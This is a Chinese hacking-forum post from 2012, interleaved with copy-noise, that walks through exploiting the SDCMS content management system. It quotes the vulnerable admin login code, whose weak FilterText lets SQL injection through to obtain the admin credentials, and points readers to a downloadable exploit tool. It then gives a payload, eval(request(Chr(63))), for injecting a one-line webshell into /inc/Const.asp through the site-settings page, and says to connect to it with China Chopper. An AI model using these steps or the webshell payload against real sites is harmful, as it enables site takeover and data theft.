作者:T00LS 鬼哥4 j: B' ?4 q$ \) f S8 u
漏洞文件:后台目录/index.asp
8 U! a, d, f5 ^/ p
- E, S' `3 I; C( D5 g% R3 K4 x; \' @, uSub Check' F( ]2 Z3 r3 p$ D1 b" j; P
Dim username,password,code,getcode,Rs* }( m4 l, M1 X1 A0 S! |
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub* r6 r/ X+ j9 g6 ]3 P4 ~+ V* G
username=FilterText(Trim(Request.Form("username")),1)9 Q2 Z3 Y6 B. y( G) @" _6 t
password=FilterText(Trim(Request.Form("password")),1)! a' X2 ^1 F. u1 P
code=Trim(Request.Form("yzm"))
% d. d3 \0 P) b; D' e getcode=Session("SDCMSCode")3 d6 {$ z: M/ x5 r
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
9 X2 c; K9 @- u+ E# r IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied! L( M% r2 x. e6 q; [& I. w
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied. Y2 w$ m* W$ x" k- g, \* |
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied+ E* C5 G* N# c. d
IF username="" or password="" Then8 @& o: q, e7 ]1 _: [1 N% W
Echo "用户名或密码不能为空"ied. [& T4 \, |- V4 G
Else( z. k F$ r2 {6 Z- M
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")8 L9 t& [ u9 [ n+ `" u/ z
IF Rs.Eof Then \0 c9 |& V% B
AddLog username,GetIp,"登录失败",1- u( p) i) T u, h# `
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
: w4 m& v( l1 [( E/ @6 a Else0 Q8 c" ]; }+ ~0 }3 t- Z- G
Add_Cookies "sdcms_id",Rs(0)
* p7 z! q0 P: ~# E% | Add_Cookies "sdcms_name",username
* l7 P/ p3 g* q/ q2 z+ T Add_Cookies "sdcms_pwd",Rs(2)$ f* O2 Y) @4 D0 }
Add_Cookies "sdcms_admin",Rs(3)$ {2 n, M( X+ ^' v' ^7 d; m; n
Add_Cookies "sdcms_alllever",Rs(4)
! E `% a H: O8 _, w Add_Cookies "sdcms_infolever",Rs(5)' ~# l" f* {# `! H
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")- J, l/ x. i% ?1 A' n2 C) t
AddLog username,GetIp,"登录成功",15 f5 r4 t% S/ ~! Q8 H; ]
'自动删除30天前的Log记录
2 h; @0 V& B3 q9 B IF Sdcms_DataType Then% r9 k0 Z8 Y2 Z( c
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")* X, J/ _' B8 N/ K7 n% q3 X5 X
Else
* q7 v0 z( B% t) Y1 }& K6 F F6 r, b Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")0 {; @, o0 i1 L# l+ _
End IF
7 _% u9 g- G1 b Go("sdcms_index.asp")
% @8 e* C V9 e% }% f% ^, n2 P End IF$ Z! V( v' q( r) Y6 O: o2 U6 X$ ~, ~
Rs.Close
) _, j% p6 h% l5 E" F+ ?1 o Set Rs=Nothing
6 v: K, a8 b) i' S End IF2 v. b8 [# @6 }, O# B% e
End Sub
8 c3 S7 M. Q4 P% C) a- u) e7 k) ]2 {( n/ k: _2 s
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
# Q9 r& ~+ |: ~6 L- H; z% f$ l( X2 P& _. x! R6 A2 ^
Function FilterText(ByVal t0,ByVal t1). y5 { p; G4 N0 K* X
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function( c. l$ `6 `- k2 H" k$ L
t0=Trim(t0)
& P1 m! U- w) L- A; T Select Case t1
- ?( d5 J* m2 j- }# F Case "1"
9 U1 W9 Q- y! ~4 U t0=Replace(t0,Chr(32),"")
- L( _$ D+ O* x2 I( s t0=Replace(t0,Chr(13),"")% m/ h A; A( d8 ?9 T
t0=Replace(t0,Chr(10)&Chr(10),"")
# ~6 ]) ~2 F% H t0=Replace(t0,Chr(10),"")5 r! g0 r* s/ c1 \2 }# v
Case "2"2 I) }$ c& a( T3 p! P, F4 R$ B
t0=Replace(t0,Chr(8),"")'回格1 c" |4 o2 E8 H: y9 I
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
6 y5 W3 I a* `8 L t0=Replace(t0,Chr(10),"")'换行
, T5 x: w n; B+ Y. v- a7 b t0=Replace(t0,Chr(11),"")'tab(垂直制表符)3 E5 f8 w3 g0 h. ^$ p
t0=Replace(t0,Chr(12),"")'换页
8 Q! C1 o3 m( v1 G" k t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
4 ?) \5 y$ i& X3 z. j4 Z* |: Z- k) t t0=Replace(t0,Chr(22),"")
+ K, A; M& q( _) I4 T t0=Replace(t0,Chr(32),"")'空格 SPACE
% I$ L7 @! c1 n t0=Replace(t0,Chr(33),"")'!
+ c, R" m- d9 @ t0=Replace(t0,Chr(34),"")'"! d9 Z0 m& D" X- q3 f! e
t0=Replace(t0,Chr(35),"")'#
6 w5 Q8 M& {' p4 s1 X t0=Replace(t0,Chr(36),"")'$' J2 r) a: u& O, P
t0=Replace(t0,Chr(37),"")'%
2 b7 }' |* ]6 s" f t0=Replace(t0,Chr(38),"")'&
5 b9 A7 i6 a! y& T8 C3 h t0=Replace(t0,Chr(39),"")''/ l' z4 W7 K4 r/ T$ G
t0=Replace(t0,Chr(40),"")'(
2 [% \, A" U/ \' C* v- A) w: E" ^ q t0=Replace(t0,Chr(41),"")'), c+ w k4 T# ?0 W1 H p" Z
t0=Replace(t0,Chr(42),"")'*
% G9 L0 E- A- T/ ?8 q t0=Replace(t0,Chr(43),"")'+' t; f- G. r; ^0 Z9 x
t0=Replace(t0,Chr(44),"")',
2 k! K; ~0 F! \+ q+ { t0=Replace(t0,Chr(45),"")'-
% h. `% }6 P' r$ e6 p" n4 {# | t0=Replace(t0,Chr(46),"")'.
$ E# m- k- S7 F0 |" T- A8 ^8 H, F# ? t0=Replace(t0,Chr(47),"")'/
' s* a. L& B/ p t0=Replace(t0,Chr(58),"")':6 J9 s. C6 m( e# P8 B
t0=Replace(t0,Chr(59),"")';, P9 X) B: E1 r* P) S
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
, y4 M, N1 r, F/ b t0=Replace(t0,Chr(63),"")'?
: X } v4 S" X- c t0=Replace(t0,Chr(64),"")'@
6 Y" C1 j* Q2 K6 R( y+ R) I t0=Replace(t0,Chr(91),"")'\
( [, a' }9 i n; }" J$ Q5 A: z t0=Replace(t0,Chr(92),"")'\
' D, h+ G- u% Y, ?% E( \* G t0=Replace(t0,Chr(93),"")']& @, U0 ^0 D! d+ i
t0=Replace(t0,Chr(94),"")'^4 y4 X) D& c; C8 p9 @0 O
t0=Replace(t0,Chr(95),"")'_
% b! F: z6 b" L& y t0=Replace(t0,Chr(96),"")'`+ S# c3 J. e) u9 u4 o5 d6 B
t0=Replace(t0,Chr(123),"")'{/ M/ p% Q8 A2 m7 i
t0=Replace(t0,Chr(124),"")'|
5 E9 G2 T5 @5 U) J9 I t0=Replace(t0,Chr(125),"")'}3 F+ h& b. E' w# M' G6 d
t0=Replace(t0,Chr(126),"")'~
6 P2 J$ u0 ~# b& [+ j Case Else
6 K2 N! Z" W- A; ~5 H t0=Replace(t0, "&", "&")
# z2 j, a& N2 B0 m! E; n t0=Replace(t0, "'", "'")' f/ J- U8 l @: x( g5 E$ z5 H
t0=Replace(t0, """", """)6 Y$ u( u) b z; \6 u3 x" E: R2 ^; i
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
/ a+ H `( ^1 d8 z( _4 ~/ k V; H End Select
+ p9 \9 d# T7 @, s1 q* l IF Instr(Lcase(t0),"expression")>0 Then# x9 f0 l+ q6 _) A6 b
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
+ e1 g8 f% r9 C End If- e/ Q, H% D- J5 D2 I+ ?
FilterText=t0- n3 P8 S- R# Y
End Function
3 _" L3 h; `* W2 Z4 `; N% i R- P- h1 {( [+ U7 Q, r
看到没。直接参数是1 只过滤5 n) C! i) I8 z1 X5 \! L
t0=Replace(t0,Chr(32)," ")3 j% V5 o3 E% {/ R! Z* }
t0=Replace(t0,Chr(13),""), F, Q+ z4 Z# w" o8 D* u
t0=Replace(t0,Chr(10)&Chr(10),"
; [8 f( A6 `- p) j! Z9 n" `. d")7 F& P( f( l; u. Y3 F+ N( y, H
t0=Replace(t0,Chr(10),"! w |7 q$ ^* s
")8 ], Z8 r; C" O& @, d
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!# t$ |! }3 T0 X, Y: |& O
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
, t* D. g9 |! m- U& c
3 `$ d- Z' T- b# U+ X' }' I7 y测试:
3 e% s4 @9 J- r7 A
. E1 [! }( e! a/ C5 j
' A% u* d6 ?' |! R1 r2 f/ l& I+ T现在输入工具上验证码,然后点OK& e; q2 E# y0 C- m
+ z, J7 L; N; u; f3 k, v
+ w+ ~% \, t' \+ V K6 ?3 k
看到我们直接进入后台管理界面了,呵呵!
9 H R7 o5 c. N; M/ F) X. ~+ N' c% n* |6 g1 a8 x, ?) B
5 V# ^) G* r: }+ U2 l
" N( C a7 B0 Z! @这样直接进入后台了。。。。
$ C% r4 K# F. o9 }4 E% Y# S* l; e0 ?7 i( q
' s- C5 g. t" N/ L8 p5 q8 X- g8 B8 H* h6 ]2 d+ \2 s* p, @
SDCMS提权:
3 |% N# Z8 e2 [6 K; d( Y% ?) @1 K1 [% P
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?! B/ t/ y( G2 q) p; t0 _% p
5 d. R7 |! f. J6 y, s! h1 Q3 e- \* a. Z" ~1 k& t! D
" o% @3 x/ X+ g& p3 } s8 N9 S
OK,现在用菜刀连接下!! W3 ]; f4 J& Z {& L* U; T
9 F) b, f7 C+ `2 k
: Z8 N. d* P+ n' q
' K ~. {5 v: X& G; ^
8 Y( u+ {1 Q+ D
% } D2 u+ ]( K4 e5 u |
发表于 2012-11-9 20:57:02
收藏
支持
反对